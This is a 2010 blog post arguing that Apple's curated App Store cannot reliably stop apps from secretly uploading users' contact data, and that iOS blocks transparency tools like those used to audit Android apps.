September 30, 2010

“Curated” Doesn’t Necessarily Mean “Secure”

Much discussion of Android vs. iPhone has centered on their “open” and “closed” app stores, respectively: any application run on an iPhone must be vetted by Apple, whereas an Android phone can run applications from any source.

Recently the article Researchers find phone apps sending data without notification rightly caused a flurry of consternation when it was demonstrated that up to ⅔ of popular Android apps could be sharing users’ personal data with shadowy servers somewhere.

Many felt, erroneously, this was some kind of redemption of Apple’s curated approach. With absolutely no slight intended towards Apple or its App Store Reviewers, it is, in practice, impossible for Apple to guarantee that a user’s data won’t get sent from any application that Apple has approved. In fact, the curated nature of the iOS App Store makes Apple’s approach less secure in many ways, as the tools used to detect the breaches in security on Android would not be approved on the iOD App Store currently, so iPhone users don’t have as simple a way to detect if their phones are sharing their personal information.

To demonstrate my first point, let’s assume that the evil foreign company “” wants to harvest e-mail addresses from your iPhone contacts list. They write an app called “Somewhat Perturbed Birds” which simply reads your contact list, bundles it up, and uploads it to “”

Would Apple catch this? Maybe. Realize that many applications “phone home” when you run them, with reasons many would consider legitimate, with Apple’s blessing. Almost every game on my iPhone right now connects to a central server when I run it, to hook me up with other users and let me join “teh social.” Farmville (which I don’t have) connects to a server. All OpenFeint and Plus+ games connect to a server. Words with Bugs — er, Friends — connects to a server.

Does Apple even check? Do they have a packet-sniffer hooked up all the time? To both the 3G and the WiFi? Do they manually take apart the raw packets and see if their payload is potentially evil?

I don’t know. But let’s say Apple does. So they reject’s app, on the basis that it is sending “iffy” data to a server. And the war begins: Rewrites the app to encrypt or obfuscate the data they send, resubmits.
Apple: Stops approving apps with encrypted data. Rewrites the app to stop submitting data unless they aren’t on an Apple internal network.
Apple: Starts testing devices using simulated random IP addresses. Puts a timer on the app so it doesn’t try submitting data until a month after they submit it for approval.

Wait, you say. I’m sure Apple has some automated tools that are making my phone secure. Well, probably. Obviously, again, I don’t know for sure. I do know that Apple has very small teams, and they aren’t magic — it was a lot of work just writing iOS and keeping it up-to-date. They don’t have infinite engineering cycles to spend on their store.

So, let’s assume they have some tool. This would be a good thing — it would help catch the dumber malware authors. But, unfortunately for Apple, it’s been proven that you can’t automatically detect whether a program will do something ill or not — it’d be tantamount to solving the “Halting Problem,” which is provably impossible to do. (Consider that for any code Apple writes, Malfeasance could simply embed that code in their program, and run that code on themselves and choose not to do evil in the situations in which Apple’s code thinks they would, thus proving Apple wrong.)

Now, Apple doesn’t actually have to prove an application will do something evil to reject it — they can (and should!) reject apps they think are likely to do evil, which is a much simpler problem, in that it’s actually possible. But, still, quite hard. Very hard. Because both looking at a user’s contacts list and contacting a server are somewhat innocuous activities. Even sending in some information to a server based on contact information isn’t always bad — I’ve voluntarily submitted my contacts list to Plus+ to find my friends who have spare frogs, for example.

The curated nature of the App Store is easily confused with the security measures inside iOS itself, although the two are separate and have very different functions. For example, iOS could require an app to ask a user for permission before it accesses her contacts list (as Android does, I understand) — but it does not. This would (if written correctly) actually prevent the exploit above, unless the user were tricked into answering “yes” to contact access (eg, “Would you like to share your score in ‘Ambivalent Birds’ with your friends?”).

So, the better approach to security would be transparency, which is to say users could install applications like the one being written by Peter Gilbert, above, which would tell them when data is being sent to servers, and they could use their own judgment about whether a particular program should be contacting a particular server given their recent actions. With many pairs of paranoid eyes would come much better app validation than Apple could do in a few days.

But this isn’t allowed on iOS right now — the necessary APIs are verbotten, and Apple apparently (and ironically) has written a tool to automatically detect if an application is using APIs Apple doesn’t allow. So, in this case, Apple’s curated approach has potentially made them less secure than Android. (Note that Apple’s curation does have other security benefits — although it’s impossible to catch every tainted program, it is still good practice to catch some of them; it makes users a bit safer. Security is a continuum: we shouldn’t throw up our hands and say, “Can’t win, don’t try.”)

The final thought is this: We know, from Mr. Gilbert’s work, that some large percentage of Android apps is sending out data we may not want them to. But we have no idea what percentage of iPhone apps are doing the same thing. And, in fact, we can’t find this out easily, because of a curated App Store.

Labels: ,